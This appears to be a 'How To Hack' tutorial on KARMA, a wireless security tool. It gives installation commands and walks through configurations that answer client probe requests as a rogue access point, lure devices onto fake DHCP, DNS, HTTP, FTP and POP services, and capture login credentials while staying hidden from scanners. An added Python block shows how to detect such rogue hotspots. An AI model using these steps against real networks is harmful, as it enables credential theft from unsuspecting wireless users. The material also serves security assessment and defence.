How To Hack: Using KARMA to Capture Clients as a Rogue Wifi Hotspot

“KARMA is a set of tools for assessing the security of wireless clients at multiple layers. Wireless sniffing tools discover clients and their preferred/trusted networks by passively listening for 802.11 Probe Request frames. From there, individual clients can be targeted by creating a Rogue AP for one of their probed networks (which they may join automatically) or using a custom driver that responds to probes and association requests for any SSID. Higher-level fake services can then capture credentials or exploit client-side vulnerabilities on the host.” -

Download latest stable code from:

We will cover the following:

  • Installing KARMA
  • Using KARMA (discovery)
  • Using KARMA (Rogue Services)

Installing KARMA: (the number following karma may be different)

tar zxvf karma-20060124.tar.gz

cd karma-20060124

cp  src/misc/madwifi.patch  /root

cd /root

patch -p0  <  madwifi.patch

ln -s  /sbin/iwconfig  /usr/sbin/iwconfig

ln -s  /sbin/iwpriv  /usr/sbin/iwpriv

ln -s  /sbin/iwevent  /usr/sbin/iwevent

yum install ruby

(answer “y” when prompted).

Using KARMA (discovery):

cd /tools/wifi/karma-20060124

bin/ ath0

(cd ./src/ && make) && ./src/karma ath0

“This display will list wireless clients in range and the networks they send probe requests for.  This reveals the entries in their preferred networks list.” -

KARMA runs in stealth mode, so basic wireless scanning activity (e.g. Netstumbler) will not detect the server's presence.

Using KARMA (Rogue Services):

KARMA also provides a number of other configurations stored in karma-20060124/etc



karma-scan.xml “Attempts to find insecure wireless clients that will associate to rogue network and possibly obtain IP address via DHCP”. -


cd /tools/wifi/karma-20060124

bin/  ath0

bin/karma  etc/karma-scan.xml

Now that the rogue services are started, any probing client will connect to KARMA on our machine, whichever SSID that client chooses to use.

Above we can see the client received the IP address from KARMA’s DHCP server.
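Seen from the defender's side, the behaviour described above (one access point answering probes for whatever SSID a client asks for) is itself a detection signal. The following is an added example, not part of KARMA or of the original post: it flags any BSSID that sends probe responses for too many distinct SSIDs in a short window, or that answers a canary SSID no real AP serves. The frame records, the canary name and the thresholds are constructed assumptions.

```python
from collections import defaultdict

# Constructed sample: (timestamp_seconds, frame_type, bssid, ssid) records such as a
# wireless IDS sensor might extract from captured 802.11 management frames.
SAMPLE_FRAMES = [
    (0.0, "probe-resp", "00:11:22:33:44:55", "CorpWLAN"),
    (0.4, "probe-resp", "de:ad:be:ef:00:01", "linksys"),
    (0.9, "probe-resp", "de:ad:be:ef:00:01", "HotelGuest"),
    (1.3, "probe-resp", "de:ad:be:ef:00:01", "CoffeeShop"),
    (1.8, "probe-resp", "de:ad:be:ef:00:01", "canary-7f3a91"),
    (2.0, "beacon", "00:11:22:33:44:55", "CorpWLAN"),
    (65.0, "probe-resp", "00:11:22:33:44:55", "CorpWLAN-Guest"),
]

# Assumption: the sensor periodically probes for this random SSID, which no
# legitimate AP is configured to serve, so any answer is suspicious.
CANARY_SSIDS = {"canary-7f3a91"}
# Assumption: legitimate multi-SSID APs usually use one BSSID per SSID; tune per site.
MAX_SSIDS_PER_BSSID = 2
WINDOW_SECONDS = 60.0


def find_promiscuous_aps(frames, max_ssids=MAX_SSIDS_PER_BSSID,
                         window=WINDOW_SECONDS, canaries=CANARY_SSIDS):
    """Return {bssid: {"ssids": set, "canary": bool}} for suspicious responders."""
    history = defaultdict(list)   # bssid -> [(timestamp, ssid)] inside the window
    findings = {}
    for ts, ftype, bssid, ssid in sorted(frames):
        if ftype != "probe-resp" or not ssid:
            continue              # beacons and wildcard (empty) SSIDs are ignored
        bssid = bssid.lower()
        # Slide the window: drop responses older than `window` seconds.
        history[bssid] = [(t, s) for t, s in history[bssid] if ts - t <= window]
        history[bssid].append((ts, ssid))
        distinct = {s for _, s in history[bssid]}
        hit_canary = ssid in canaries
        if len(distinct) > max_ssids or hit_canary:
            entry = findings.setdefault(bssid, {"ssids": set(), "canary": False})
            entry["ssids"] |= distinct
            entry["canary"] = entry["canary"] or hit_canary
    return findings


if __name__ == "__main__":
    for bssid, info in find_promiscuous_aps(SAMPLE_FRAMES).items():
        print(bssid, sorted(info["ssids"]), "canary hit" if info["canary"] else "")
```
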



karma.xml “Runs a rogue base station with DHCP, DNS and HTTP services.  The HTTP service re-directs all requests to the ExampleWebExploit module that displays a simple HTML page.  This page can be replaced with something that informs the user that their wireless settings are insecure and that it may be a violation of corporate policy etc” -


cd /tools/wifi/karma-20060124

bin/  ath0

bin/karma  etc/karma.xml

KARMA is now offering a variety of services (POP, FTP and HTTP) for any curious user to connect to.

Above we can see an attempted FTP connection to which was actually received by KARMA, and the user's credentials (username = myusername and password = mypassword) were captured by KARMA.



karma-lan.xml “This configuration runs a rogue DHCP, DNS and HTTP services on an existing (wired) network connection. The HTTP service redirects all requests to ExampleWebExploit module that displays simple HTML page” -


cd /tools/wifi/karma-20060124

bin/  ath0

bin/karma  etc/karma-lan.xml

The karma-lan.xml configuration file provides you with all the features (e.g. to capture POP, FTP and HTTP traffic) of karma.xml but for a wired interface.
